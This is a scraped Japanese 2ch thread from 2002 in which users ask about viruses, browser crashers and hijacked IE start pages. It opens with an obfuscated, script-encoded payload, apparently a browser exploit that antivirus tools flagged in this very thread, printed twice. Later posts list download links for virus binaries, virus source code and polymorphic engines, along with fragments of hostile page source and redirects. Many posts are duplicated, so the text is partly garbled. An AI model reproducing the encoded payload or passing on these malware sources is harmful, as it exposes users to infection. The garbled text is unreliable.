http://vx.netlux.org/dat/vct.shtml
//**Start Encode**#@~^9gEAAA==@#@&NG1Es+xDRS.kD+cJ@!bKKd2K,
u2&MC:xTPqqGKu'T~1W[+{^WsRhdclmOr7+pRz^Dk-(;W:aW
nxD@*@!zznKJAK@*rbi@#@&0!U^YbW PzE"rv#`YMz
mFx[KmEhn Y la2^+Ok$ZTi@#@&mqRk+OZd?(9vJ w1&lfZy+RF;
sZOqF9T b9AOR!ZZT*wf*0)ZANJ*I@#@&C8R1D+mY(xkYCx1+c~*i@#@&jt
^P',CqRV+Dr8Ln^D`bi@#@&l8RdnDZSj(G`E Z9W&oA!8OsZ,2RF8ZoOR,*T
!!zTZO!*W++%)J*i@#@&O.H ~?4sR"+L MkYncrCFZ`w'?G6YSlD-'
\k1DG/K0Ow'qxDnD +Y,3aw^WM+.-w\mkU-'jYmDO~hlonEBJ4YD2=z&Sh
SRxm\ nYSW.3cxnOJ:X4G:zJ*I@#@&)mmY^tcn* N81CY1tcn*
8NdYPksnKEOvJHEyb`*E~8!T!*i@#@&JzO @*@#@&PJQAAA==
^#~@
u2&MC:xTPqqGKu'T~1W[+{^WsRhdclmOr7+pRz^Dk-(;W:aW
nxD@*@!zznKJAK@*rbi@#@&0!U^YbW PzE"rv#`YMz
mFx[KmEhn Y la2^+Ok$ZTi@#@&mqRk+OZd?(9vJ w1&lfZy+RF;
sZOqF9T b9AOR!ZZT*wf*0)ZANJ*I@#@&C8R1D+mY(xkYCx1+c~*i@#@&jt
^P',CqRV+Dr8Ln^D`bi@#@&l8RdnDZSj(G`E Z9W&oA!8OsZ,2RF8ZoOR,*T
!!zTZO!*W++%)J*i@#@&O.H ~?4sR"+L MkYncrCFZ`w'?G6YSlD-'
\k1DG/K0Ow'qxDnD +Y,3aw^WM+.-w\mkU-'jYmDO~hlonEBJ4YD2=z&Sh
SRxm\ nYSW.3cxnOJ:X4G:zJ*I@#@&)mmY^tcn* N81CY1tcn*
8NdYPksnKEOvJHEyb`*E~8!T!*i@#@&JzO @*@#@&PJQAAA==
^#~@
360 :ひみつの検疫さん:2024/12/20(金) 13:56:39 ID:MarkedRes
汚染を除去しました。
361 :名無しさん@お腹いっぱい。:02/02/10 05:08
知人から、下記のようなメールが来てウイルスだと判断したのですが、
どこのサイトにも該当するものがありません。どなたか正体を教えてください。
ちなみにその知人はBadtransを繰り返し送ってくるバカです。ハードディスク
に空きが無くてアンチウイルスソフト入れられないんだとさ。
---------
Subject: A good tool
Received: from 21cn.com ([61.140.60.248])
by ums513.nifty.ne.jp (8.9.3+3.2W/3.7W000811) with SMTP id KAA22507
for <******@nifty.ne.jp>; Sun, 3 Feb 2002 10:15:20 +0900 (JST)
Message-Id: <[email protected]>
Received: from 21cn.com([10.2.0.6]) by 21cn.com(AIMC 2.9.5.2)
with SMTP id jm93c5cbfec; Sun, 03 Feb 2002 09:14:50 +0800
Received: from Rksvz([61.214.36.134]) by 21cn.com(AIMC 2.9.5.2)
with SMTP id jm33c57c568; Wed, 30 Jan 2002 15:11:05 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=NbLhp9koJe7UJa3DjAzK18gC2019d8L85
X-UIDL: 3c5c8f3002AWFJ8W
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
This is a good tool
I hope you would enjoy it.
添付ファイル:height.scr 86782byte、light[1].jpg 5639byte
どこのサイトにも該当するものがありません。どなたか正体を教えてください。
ちなみにその知人はBadtransを繰り返し送ってくるバカです。ハードディスク
に空きが無くてアンチウイルスソフト入れられないんだとさ。
---------
Subject: A good tool
Received: from 21cn.com ([61.140.60.248])
by ums513.nifty.ne.jp (8.9.3+3.2W/3.7W000811) with SMTP id KAA22507
for <******@nifty.ne.jp>; Sun, 3 Feb 2002 10:15:20 +0900 (JST)
Message-Id: <[email protected]>
Received: from 21cn.com([10.2.0.6]) by 21cn.com(AIMC 2.9.5.2)
with SMTP id jm93c5cbfec; Sun, 03 Feb 2002 09:14:50 +0800
Received: from Rksvz([61.214.36.134]) by 21cn.com(AIMC 2.9.5.2)
with SMTP id jm33c57c568; Wed, 30 Jan 2002 15:11:05 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=NbLhp9koJe7UJa3DjAzK18gC2019d8L85
X-UIDL: 3c5c8f3002AWFJ8W
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
This is a good tool
I hope you would enjoy it.
添付ファイル:height.scr 86782byte、light[1].jpg 5639byte
362 :名無しさん@お腹いっぱい。:02/02/10 11:03
どうでもいいけど、ウイルス最初に発見した人(感染した人)が名前つけれたらいいのにな・・・
363 :名無しさん@お腹いっぱい。:02/02/10 15:12
はあ?最初の発見者が命名しているんだよ。馬鹿。
364 :名無しさん@お腹いっぱい。:02/02/10 15:15
おいおい 2chの鯖ウィルス感染してないか?
365 :名無しさん@お腹いっぱい。:02/02/10 15:17
ああああぁぁじょjf@えjふぁえいrjふぉあえjふぉえrjg:えあおrjvごえいjr
366 :名無しさん@お腹いっぱい。:02/02/10 15:22
このスレ警告出ます JS.Exception.Exploit (by ノートン)
だれかソース(一部)書いたのかYO
だれかソース(一部)書いたのかYO
367 :名無しさん@お腹いっぱい。:02/02/10 18:41
質問です。
友達のPCなんですけど、
2chで何かのファイルを落としたらウイルスに感染してしまったそうです。
症状はPCを使っていると、いきなり画面が黒くなり
コワイ女の人の画像とともに悲鳴が聞こえるそうです。
HPでもそんなのがよく貼ってありましたよね。たぶんあれのウイルス版だと思います。
駆除の方法がわからないのですが、どうすればよいでしょうか?
友達のPCなんですけど、
2chで何かのファイルを落としたらウイルスに感染してしまったそうです。
症状はPCを使っていると、いきなり画面が黒くなり
コワイ女の人の画像とともに悲鳴が聞こえるそうです。
HPでもそんなのがよく貼ってありましたよね。たぶんあれのウイルス版だと思います。
駆除の方法がわからないのですが、どうすればよいでしょうか?
368 :名無しさん@お腹いっぱい。:02/02/10 20:20
>>367
聞き飽きた。
聞き飽きた。
369 : :02/02/12 07:55
370 : :02/02/12 08:26
>>367
漏れもスレURL貼るのめんどくさい。
初級ネット板いけば、スレタイトルですぐ分かるのがあるから
そこ見てくれ。
同様の連中がまだいるせいか、たいてい上の方にあるし。
一応、いっとくけど全然ウイルスじゃないし。
漏れもスレURL貼るのめんどくさい。
初級ネット板いけば、スレタイトルですぐ分かるのがあるから
そこ見てくれ。
同様の連中がまだいるせいか、たいてい上の方にあるし。
一応、いっとくけど全然ウイルスじゃないし。
371 :名無しさん@お腹いっぱい。:02/02/12 14:37
質問です。初心者ですがすみません。
ウィルスかどうかはわからないのですが、
ウィンドウを最大化(最小化、閉じる)する□や×の部分がいきなりバグって
数字のようなものになってしまいまいした。
ブラウザの右下部分にはπが出ています。
その他にも、本来ならば▼なはずが数字に化けています。
チェックボックスも化けています。
PCの使用にあたって大した影響はないのですが、
これはウィルスなのでしょうか?
(スキャンにはひっかかりませんでした)
それともPC自体壊れているのでしょうか。
情報お願いします。
ウィルスかどうかはわからないのですが、
ウィンドウを最大化(最小化、閉じる)する□や×の部分がいきなりバグって
数字のようなものになってしまいまいした。
ブラウザの右下部分にはπが出ています。
その他にも、本来ならば▼なはずが数字に化けています。
チェックボックスも化けています。
PCの使用にあたって大した影響はないのですが、
これはウィルスなのでしょうか?
(スキャンにはひっかかりませんでした)
それともPC自体壊れているのでしょうか。
情報お願いします。
372 :名無しさん@お腹いっぱい。:02/02/12 14:49
373 :名無しさん@お腹いっぱい。:02/02/12 14:51
374 :名無しさん@お腹いっぱい。:02/02/12 19:21
>373
親切君発見
親切君発見
ウイルスが多量に置いてあるサイトがありました
ttp://sinagoga.hoops.ne.jp/html/virus_down.htm
ttp://windows3000.virtualave.net/NewToolz.html
行くだけなら良いですが実行しないように
このアドレスを憶えておいてひっかからないようにしましょう
何か起きても責任は持ちません
ttp://sinagoga.hoops.ne.jp/html/virus_down.htm
ttp://windows3000.virtualave.net/NewToolz.html
行くだけなら良いですが実行しないように
このアドレスを憶えておいてひっかからないようにしましょう
何か起きても責任は持ちません
376 :名無しさん@お腹いっぱい。:02/02/14 15:56
>>375
Thanx! コレクションが増えましたっ
Thanx! コレクションが増えましたっ
すみません。まちがえました。
ttp://windows3000.virtualave.net/NewToolz.htm
ttp://easyweb.easynet.co.uk/~hiros
ttp://sinagoga.hoops.ne.jp/html/virus_down.htm
行くだけなら良いですが実行しないように
このアドレスを憶えておいてひっかからないようにしましょう
何か起きても責任は持ちません
ttp://windows3000.virtualave.net/NewToolz.htm
ttp://easyweb.easynet.co.uk/~hiros
ttp://sinagoga.hoops.ne.jp/html/virus_down.htm
行くだけなら良いですが実行しないように
このアドレスを憶えておいてひっかからないようにしましょう
何か起きても責任は持ちません
378 :名無しさん@お腹いっぱい。:02/02/16 23:11
あげ。
379 :名無しさん@お腹いっぱい。:02/02/17 00:22
380 :名無しさん@お腹いっぱい。:02/02/17 00:34
>>379
http://www.google.com/search?hl=ja&q=%22%2Bwww.top.or.jp%2F%7Egodhand%2Fa2.html%22+%83E%83C%83%8B%83X&lr=
http://www.google.com/search?hl=ja&q=%22%2Bwww.top.or.jp%2F%7Egodhand%2Fa2.html%22+%83E%83C%83%8B%83X&lr=
381 :名無しさん@お腹いっぱい。:02/02/17 00:35
>>377
漏れは、旬な奴探してるから要らない。。。
漏れは、旬な奴探してるから要らない。。。
382 :↑これみて自分で勉強してね:02/02/17 00:36
383 :名無しさん@お腹いっぱい。:02/02/17 00:36
>>380
ありがとうございました。安心しました
ありがとうございました。安心しました
384 :名無しさん@お腹いっぱい。:02/02/17 01:20
madokaを踏んでしまいました。
気持ち悪くてしょうがないです。
セーフモードで起動してファイルを削除したのですが
まだ、画像と「キャー」という声が出てきます。
どうしたらいいのですか?
教えてください。
気持ち悪くてしょうがないです。
セーフモードで起動してファイルを削除したのですが
まだ、画像と「キャー」という声が出てきます。
どうしたらいいのですか?
教えてください。
385 :↑ネタじゃなければ過去ログ読んで:02/02/17 01:31
>>386
うん!勉強になるねw …ツーカ、カブッタスマソ..
うん!勉強になるねw …ツーカ、カブッタスマソ..
388 :名無しさん@お腹いっぱい。:02/02/19 02:08
ノートンのアンチウィルスを使っているのですが、
9x系のOSなので、リソースの問題で常駐はさせていません。
(使っている2chブラウザとも相性が悪いし)
で、ウィルスサイトと言われるところを踏んでしまったのですが、
アンチウィルスのレベルを目いっぱい上げて、全ての
ファイルをスキャンしても、何も出てこないのです。
そういう種類のトロイとか、ウィルスは存在しますか?
9x系のOSなので、リソースの問題で常駐はさせていません。
(使っている2chブラウザとも相性が悪いし)
で、ウィルスサイトと言われるところを踏んでしまったのですが、
アンチウィルスのレベルを目いっぱい上げて、全ての
ファイルをスキャンしても、何も出てこないのです。
そういう種類のトロイとか、ウィルスは存在しますか?
389 :ノートン君ハイ!:02/02/19 02:12
>>388
バージョンによって検出されるトロイと素通りのトロイがいると思われ。
バージョンによって検出されるトロイと素通りのトロイがいると思われ。
390 :名無しさん@お腹いっぱい。:02/02/19 02:22
391 :名無しさん@お腹いっぱい:02/02/19 06:01
>>390
そのあんたがいう"ウィルスサイト"てのは踏んだだけで感染するサイトなのか?
それともウィルスがたくさん置いてあるだけのサイトなのか?
自分で.exe実行されたかどうかも知らないの?
ついでに2002にしろ
そのあんたがいう"ウィルスサイト"てのは踏んだだけで感染するサイトなのか?
それともウィルスがたくさん置いてあるだけのサイトなのか?
自分で.exe実行されたかどうかも知らないの?
ついでに2002にしろ
392 :名無しさん@お腹いっぱい。:02/02/19 06:27
そのサイトのURL貼ってみるのが速いが
どーせまた godhand みたいなとこだろ。
どーせまた godhand みたいなとこだろ。
393 :あや:02/02/19 14:46
「IEstart.gen」ってどうやって駆除したらいいんですか? McAfeeのウィルススキャンでも効き目ない見たいんです。
394 :390:02/02/19 15:09
>>391
ごめんなさい、ウィルスに関してはかなり知識が乏しいので
(今まで、トロイとウィルスとワームの違いさえ知らなかった)
踏んだだけで、感染するのかしないのかさえも知らないのです。
踏んだだけなら大丈夫なんでしょうか
ちなみに、>>392の方がおっしゃるように、下に貼りますが
ブラクラも伴っていますので、注意してください。
www.geocities.com/ccsacla/images0012.jpg
ごめんなさい、ウィルスに関してはかなり知識が乏しいので
(今まで、トロイとウィルスとワームの違いさえ知らなかった)
踏んだだけで、感染するのかしないのかさえも知らないのです。
踏んだだけなら大丈夫なんでしょうか
ちなみに、>>392の方がおっしゃるように、下に貼りますが
ブラクラも伴っていますので、注意してください。
www.geocities.com/ccsacla/images0012.jpg
395 :ひみつの検疫さん:2024/12/20(金) 13:56:39 ID:MarkedRes
汚染を除去しました。
396 : :02/02/19 19:02
続き
</script>
</body>
</html>
<noembed><noscript><noscript><noscript><xml>
View-Source:http://www.geocities.com/fes74592/
View-Source:http://www.geocities.com/fes74592/images0012.jpg
View-Source:http://www.geocities.com/fes74592/ssopn.html
http://www.geocities.com/fes74592/ok.jpg
View-Source:http://www.geocities.com/fest7742/
View-Source:http://www.geocities.com/fest7742/images0012.jpg
View-Source:http://www.geocities.com/fest7742/ssopn.html
http://www.geocities.com/fest7742/ok.jpg
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
<META HTTP-EQUIV="Refresh" CONTENT=25;URL="ssopn.html">
</script>
</body>
</html>
<noembed><noscript><noscript><noscript><xml>
View-Source:http://www.geocities.com/fes74592/
View-Source:http://www.geocities.com/fes74592/images0012.jpg
View-Source:http://www.geocities.com/fes74592/ssopn.html
http://www.geocities.com/fes74592/ok.jpg
View-Source:http://www.geocities.com/fest7742/
View-Source:http://www.geocities.com/fest7742/images0012.jpg
View-Source:http://www.geocities.com/fest7742/ssopn.html
http://www.geocities.com/fest7742/ok.jpg
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
<META HTTP-EQUIV="Refresh" CONTENT=25;URL="ssopn.html">
397 :名無しさん@お腹いっぱい。:02/02/19 19:07
>>394-396
あーそれ、前に見たことある。ということは既出だ。
たぶん、このスレか初心者スレ。
ブラクラとスタートページの書き換えの複合だと思う。
他にもなにかあったかも。
>どーせまた godhand
じゃ〜なかったな。すまそ。
あーそれ、前に見たことある。ということは既出だ。
たぶん、このスレか初心者スレ。
ブラクラとスタートページの書き換えの複合だと思う。
他にもなにかあったかも。
>どーせまた godhand
じゃ〜なかったな。すまそ。
399 :名無しさん@お腹いっぱい。:02/02/19 20:19
400 :.:02/02/19 23:07
今更ニムダの事なんですが、先ほどモナ板でリンクされてたHPでJS_NIMUDA.A
ってのに引っかかりましたウイルスバスター2002入れたたんで事無きを得たんですが
セキュリティ関係のHPいくとPE_NIMUDA.Aって表記されてるんですよね。
名前が違うだけで対処はニムダと一緒でよろしいのでしょうか?
ってのに引っかかりましたウイルスバスター2002入れたたんで事無きを得たんですが
セキュリティ関係のHPいくとPE_NIMUDA.Aって表記されてるんですよね。
名前が違うだけで対処はニムダと一緒でよろしいのでしょうか?
ありがとうございました。
パッチもちゃんと当てました。
これで安心して、修復ポイントが作れます。(^^;
パッチもちゃんと当てました。
これで安心して、修復ポイントが作れます。(^^;
402 :名無しさん@お腹いっぱい。:02/02/19 23:14
>>400
ウィルスの名前の定義はウィルス対策ソフトのメーカーによって異なる
ウィルスの名前の定義はウィルス対策ソフトのメーカーによって異なる
なるほど、そう言う事でしたか。有難うございました>>400
404 :名無しさん@お腹いっぱい:02/02/19 23:47
↑なんか"喰らったら"ていうのも変な言い方のような・・・
そんな命令喰らわされたら?・・・か・・・・
もっと精進しよう・・・
そんな命令喰らわされたら?・・・か・・・・
もっと精進しよう・・・
406 : :02/02/21 12:18
407 :名無しさん@お腹いっぱい。:02/02/22 01:36
PCの電源を落とすようなウィルスってありますか?
起動後数分(不定)で電源が落ちるので困っています
起動後数分(不定)で電源が落ちるので困っています
408 :名無しさん@お腹いっぱい。:02/02/22 02:57
>>407
ウイルスよりもPCの調子がオカシイんでは?
原因になりそうなのはいっぱいありすぎて
一概には言えないが、ディスプレイドライバや
Mouse/KB の接続が不完全とか…。CPU冷却不足とか。
ウイルスよりもPCの調子がオカシイんでは?
原因になりそうなのはいっぱいありすぎて
一概には言えないが、ディスプレイドライバや
Mouse/KB の接続が不完全とか…。CPU冷却不足とか。
409 : :02/02/22 18:40
410 : :02/02/23 00:14
>>381
これは?
http://easyweb.easynet.co.uk/~hiros/virii99/Not/asciiv.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/cb4111.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/dodgy.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/urkel.zip
これは?
http://easyweb.easynet.co.uk/~hiros/virii99/Not/asciiv.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/cb4111.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/dodgy.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/urkel.zip
411 :名無しさん@お腹いっぱい。:02/02/23 21:15
412 : :02/02/24 01:55
413 :こわい:02/02/24 10:14
超初心者です、申し訳ありませんが助けていただけませんでしょうか!
【ttp://www.top.or.jp/~godhand/a2.html
こんなものを踏んじゃったんですけど、これって悪い物なのでしょうか?
御存知の方教えてください。よろしくおねがいします。
【ttp://www.top.or.jp/~godhand/a2.html
こんなものを踏んじゃったんですけど、これって悪い物なのでしょうか?
御存知の方教えてください。よろしくおねがいします。
414 :名無しさん@お腹いっぱい。:02/02/24 10:31
>>413 マルチしちゃいかんな。
415 :>414:02/02/24 10:52
>>413
マルチってどういう操作のことでしょうか…教えていただけませんでしょうか? どうやったら対処できますか?
よろしくお願いします…
マルチってどういう操作のことでしょうか…教えていただけませんでしょうか? どうやったら対処できますか?
よろしくお願いします…
416 :名無しさん@お腹いっぱい。:02/02/24 11:09
>>413
マルチというのはあちこちで同じことを書くことだ。
マルチは嫌われているのでつくレスもつか無くなる。
初心者を免罪符にするなよ、初心者なりに他のスレを見て回ればこのことは
判るはずだからな。
http://www.top.or.jp/~godhand/a2.html は禿げしく外出なので気にするな。
気になるならこのスレ、くだ質、初質の最初から読めば出てくるはずだ。
マルチというのはあちこちで同じことを書くことだ。
マルチは嫌われているのでつくレスもつか無くなる。
初心者を免罪符にするなよ、初心者なりに他のスレを見て回ればこのことは
判るはずだからな。
http://www.top.or.jp/~godhand/a2.html は禿げしく外出なので気にするな。
気になるならこのスレ、くだ質、初質の最初から読めば出てくるはずだ。
417 :名無しさん@お腹いっぱい。:02/02/24 11:08
418 :名無しさん@お腹いっぱい。:02/02/24 13:57
他板で次のアドレスを踏んでしまいました。
zodiad.subnet.dk/image_002.jpg
中身は>>395の前半部分に似ています。
FDDがガリガリいって部落ら状態になり、再起動しましたが
ウイルスバスターのオンラインスキャンで、インターネットの
テンポラリフォルダに「JS_EXCEPTION.GEN」
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN
が見つかったので削除しました。
幸いActiveXとJavaスクリプトは切ってあったのですが、
部落らにはやられたのでちょっと心配しています。
念のために再インストールした方がいいのか、それとも
心配する必要はないのか、教えてください。
zodiad.subnet.dk/image_002.jpg
中身は>>395の前半部分に似ています。
FDDがガリガリいって部落ら状態になり、再起動しましたが
ウイルスバスターのオンラインスキャンで、インターネットの
テンポラリフォルダに「JS_EXCEPTION.GEN」
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN
が見つかったので削除しました。
幸いActiveXとJavaスクリプトは切ってあったのですが、
部落らにはやられたのでちょっと心配しています。
念のために再インストールした方がいいのか、それとも
心配する必要はないのか、教えてください。
419 :名無しさん@お腹いっぱい。:02/02/24 14:02
>>418
初心者スレを全レス表示してzodiadで再検索して確認。
初心者スレを全レス表示してzodiadで再検索して確認。
420 :名無しさん@お腹いっぱい。:02/02/24 14:08
最近2chの各板で貼らてるものなのだが
ttp://www.geocities.com./oohozv/image/list01.jpg
で、でんこの偽造がかかってる
\windows以下のフォルダを削除するらしい
落としてみたが、アイコンも偽造してある
当然バイナリ見ないと確認できない
これどうよ?
ttp://www.geocities.com./oohozv/image/list01.jpg
で、でんこの偽造がかかってる
\windows以下のフォルダを削除するらしい
落としてみたが、アイコンも偽造してある
当然バイナリ見ないと確認できない
これどうよ?
421 :418:02/02/24 14:29
422 :名無しさん@お腹いっぱい。:02/02/24 14:35
このスレがいきなりあがると
また新種が発生したか
と思うのは私だけ?
また新種が発生したか
と思うのは私だけ?
423 :名無しさん@お腹いっぱい。:02/02/24 14:40
>>421
どうせ、google検索するなら
http://www.google.co.jp/search?q=JS_EXCEPTION.GEN+%83E%83B%83%8B%83X+%8F%EE%95%F1&hl=ja&lr=on&btnG=Google+%8C%9F%8D%F5
>>422
新種発生しなくても、なんかスタートページが書き換えられたとか、
これ大丈夫でしょうかとかはここんとこすごく多いから
(初級ネット板なんてもう大変)
ここが上がることもあるんじゃないかなあ。
どうせ、google検索するなら
http://www.google.co.jp/search?q=JS_EXCEPTION.GEN+%83E%83B%83%8B%83X+%8F%EE%95%F1&hl=ja&lr=on&btnG=Google+%8C%9F%8D%F5
>>422
新種発生しなくても、なんかスタートページが書き換えられたとか、
これ大丈夫でしょうかとかはここんとこすごく多いから
(初級ネット板なんてもう大変)
ここが上がることもあるんじゃないかなあ。
424 :名無しさん@お腹いっぱい。:02/02/24 14:42
>>422
ああそうそう、アンチウイルスベンダーが一番詳しく、
情報が早いので、シマンテックとかトレンドマイクロで
JS_EXCEPTION.GENを探してみて。症状が書かれているので
確認の役に立つかと思う。
ああそうそう、アンチウイルスベンダーが一番詳しく、
情報が早いので、シマンテックとかトレンドマイクロで
JS_EXCEPTION.GENを探してみて。症状が書かれているので
確認の役に立つかと思う。
425 :あのう:02/02/24 14:50
Napigator最新版がトロイって話マジですか?
426 :418:02/02/24 15:20
>>423-424
レスありがとうございます。
JS_EXCEPTION.GENの情報は既に調べてあり、
報告されている現象が見られなかったのでその点では安心なのですが、
今回踏んだアドレスはブラクラも兼ねていたのでちょっと動揺してしまい、
不安になってしまいました。
>>395のソースと比べると、
<script>
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
というのが冒頭にあるんですが、この部分がブラクラだとしたら、
単純に「JS_EXCEPTION.GEN」+ブラクラと考えていいんでしょうか?
それなら問題はなさそうです。
レスありがとうございます。
JS_EXCEPTION.GENの情報は既に調べてあり、
報告されている現象が見られなかったのでその点では安心なのですが、
今回踏んだアドレスはブラクラも兼ねていたのでちょっと動揺してしまい、
不安になってしまいました。
>>395のソースと比べると、
<script>
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
というのが冒頭にあるんですが、この部分がブラクラだとしたら、
単純に「JS_EXCEPTION.GEN」+ブラクラと考えていいんでしょうか?
それなら問題はなさそうです。
427 : :02/02/24 16:07
すいません、ついうっかりアフォなことしてしまいました。
いやぁね、メール(個人アドレス)に添付ファイルなしのアドレス付きメールが
あったんで、久々に気合い入れて押したらみごとにひっかかっちゃいまして。
http://Best-Greeting.com/view.html?EFC9EWBKFJYAR
ってとこなんですが。アドレスはすでに「暴力行為がありました」とかでデリられてます。
症状は、特定のサイトを開くたびに、windows personalなんたらとかいうインストーラ立ち上がって
毎回立ち上がってウザイのでOKしたら、こんどはブラウザ立ち上げるとRAS errorなるダイアログが出て
同時に実行に失敗したとポップアップが出ます。
その後、デスクトップ、メールフォルダ、WINNTフォルダ、スタートアップフォルダに
5-1-25-389.exe
ちゃんが産み落とされます。アイコンは素敵な画像です。
ダイヤルアップじゃなくて良かったーと言う感じですが、駆除方法が思いつかないので
どうしていいものやら。
お知恵をお貸し下さいまし。
いやぁね、メール(個人アドレス)に添付ファイルなしのアドレス付きメールが
あったんで、久々に気合い入れて押したらみごとにひっかかっちゃいまして。
http://Best-Greeting.com/view.html?EFC9EWBKFJYAR
ってとこなんですが。アドレスはすでに「暴力行為がありました」とかでデリられてます。
症状は、特定のサイトを開くたびに、windows personalなんたらとかいうインストーラ立ち上がって
毎回立ち上がってウザイのでOKしたら、こんどはブラウザ立ち上げるとRAS errorなるダイアログが出て
同時に実行に失敗したとポップアップが出ます。
その後、デスクトップ、メールフォルダ、WINNTフォルダ、スタートアップフォルダに
5-1-25-389.exe
ちゃんが産み落とされます。アイコンは素敵な画像です。
ダイヤルアップじゃなくて良かったーと言う感じですが、駆除方法が思いつかないので
どうしていいものやら。
お知恵をお貸し下さいまし。
428 :名無しさん@お腹いっぱい。:02/02/24 16:22
>>426
なんかそのアドレスのところのソースを見られない。
それにJAVAスク切っていたのに、ブラクラにかかったてなあたりが
ちょっとひっかかることはひっかかるけど、
IEスタートページが大丈夫なら、もう書き換えはないんじゃないかなあ。
まあ、用心してってことで。
なんかそのアドレスのところのソースを見られない。
それにJAVAスク切っていたのに、ブラクラにかかったてなあたりが
ちょっとひっかかることはひっかかるけど、
IEスタートページが大丈夫なら、もう書き換えはないんじゃないかなあ。
まあ、用心してってことで。
429 :名無しさん@お腹いっぱい。:02/02/24 16:24
>>427
とにかくウイルススキャン。
トレンドマイクロかシマンテックへ。
とりあえずなら、下記のサイトからオンラインスキャン。
http://www.trendmicro.co.jp/
http://www.symantec.co.jp/
とにかくウイルススキャン。
トレンドマイクロかシマンテックへ。
とりあえずなら、下記のサイトからオンラインスキャン。
http://www.trendmicro.co.jp/
http://www.symantec.co.jp/
430 :名無しさん@お腹いっぱい。:02/02/24 16:28
>>427
いまから最新定義(2/23付)おとしてノートンかけてみます。
いまから最新定義(2/23付)おとしてノートンかけてみます。
431 : :02/02/24 16:29
432 :ノートンでは反応しないウイルス?:02/02/25 03:09
[email protected]
ノートンでは反応しないウイルス?
http://www.ebcvg.com/binary2.php の
Mac.Scores
http://www.ebcvg.com/sections/binary/Mac.Scores.zip
Mac.T4d
http://www.ebcvg.com/sections/binary/Mac.T4d.zip
Win32.Mix
http://www.ebcvg.com/sections/binary/Win32.Mix.zip
以上の3つはノートンは反応しません。
−−−
http://www.ebcvg.com/viruses.php
Virus Source Codes
Polymorphic Engines
がある。
http://www.ebcvg.com/sections/polymorphic/W97M.txt
はBloodhound.HybridCOM
知識があればウイルスが作成できる。
ウイルス作成ソフトもある。
http://www.ebcvg.com/binary.php
ノートンでは反応しないウイルス?
http://www.ebcvg.com/binary2.php の
Mac.Scores
http://www.ebcvg.com/sections/binary/Mac.Scores.zip
Mac.T4d
http://www.ebcvg.com/sections/binary/Mac.T4d.zip
Win32.Mix
http://www.ebcvg.com/sections/binary/Win32.Mix.zip
以上の3つはノートンは反応しません。
−−−
http://www.ebcvg.com/viruses.php
Virus Source Codes
Polymorphic Engines
がある。
http://www.ebcvg.com/sections/polymorphic/W97M.txt
はBloodhound.HybridCOM
知識があればウイルスが作成できる。
ウイルス作成ソフトもある。
http://www.ebcvg.com/binary.php
433 :ウイルス直し方教えて:02/02/25 13:50
僕のはなんか変でIEのツールバーの検索を使うと
jethomepageっていう英語の検索サイトにつながっちゃうんですよね。
いろいろ調べたんですけど、jethomepageのウイルスはメインページの
スタートページを変えちゃうっていうのなんですよね。
なんか自分の症状と違うんですよね。
誰か僕のやつの治し方わかる方いませんかね?
jethomepageっていう英語の検索サイトにつながっちゃうんですよね。
いろいろ調べたんですけど、jethomepageのウイルスはメインページの
スタートページを変えちゃうっていうのなんですよね。
なんか自分の症状と違うんですよね。
誰か僕のやつの治し方わかる方いませんかね?
434 :名無しさん@お腹いっぱい。:02/02/25 14:09
先生!ぼくも>>433とおなじようですが
IEのホームをblankにしているのですが、
そのタイトルが「http://geocities.com/braindiary」
とでています。
直し方を教えてください!
IEのホームをblankにしているのですが、
そのタイトルが「http://geocities.com/braindiary」
とでています。
直し方を教えてください!
435 :マジレスお願いします:02/02/25 14:22
SHODOCLC.DLL
これっていったいなんですか?
これっていったいなんですか?
436 :けんずぃ:02/02/25 16:37
ちょっとすみません。普段はゲーム板に生息してる者ですが、先日ウイルスバスターが妙な物を捕まえました。
が、削除してくれません。自分で削除しようとしても「現在WINDOWSが使用しています」と言われ、削除できません。
どなたか教えて下さい。これは何ですか?
パソコンに電源を入れると毎回出るエラーメッセージです。
ウイルスが検出されました(TSC.LOGを確認して下さい):
TROJ_BACKDOORM1
TROJ_YKRT.ASVR c:windows\rundV.exe 処理失敗
が、削除してくれません。自分で削除しようとしても「現在WINDOWSが使用しています」と言われ、削除できません。
どなたか教えて下さい。これは何ですか?
パソコンに電源を入れると毎回出るエラーメッセージです。
ウイルスが検出されました(TSC.LOGを確認して下さい):
TROJ_BACKDOORM1
TROJ_YKRT.ASVR c:windows\rundV.exe 処理失敗
437 :名無しさん@お腹いっぱい。:02/02/25 16:48
DOSデ サクジョ デキナイノカ?
438 :たすけてください!!:02/02/25 16:49
これを踏んでしまいました
どうしたらいいのかわかりません
本当に助けてください
よろしくお願いします
ttp://ime.nu/ime.nu/ime.nu/www.bd.wakwak.com/~shino/data/download.html
どうしたらいいのかわかりません
本当に助けてください
よろしくお願いします
ttp://ime.nu/ime.nu/ime.nu/www.bd.wakwak.com/~shino/data/download.html
439 :名無しさん@お腹いっぱい。:02/02/25 16:52
440 :けんずぃ:02/02/25 16:56
>439
ありがとうございます。助かります。
ありがとうございます。助かります。
441 : :02/02/25 16:57
442 : :02/02/25 17:00
443 :たすけてください!!:02/02/25 17:05
>>441>>442
ただ今ウィルススキャンしています。
しかし少し古いバージョンなので引っ掛からないかも知れません。
そうゆう場合どうしたらいいでしょうか?
ちなみに何故か新しいのにする事もできません。
ただ今ウィルススキャンしています。
しかし少し古いバージョンなので引っ掛からないかも知れません。
そうゆう場合どうしたらいいでしょうか?
ちなみに何故か新しいのにする事もできません。
444 :名無しさん@お腹いっぱい。:02/02/25 17:29
445 :たすけてください!!:02/02/25 17:31
446 :名無しさん@お腹いっぱい。:02/02/25 17:33
こんなGIFを作るのって、よっぽど暇なんだろね。
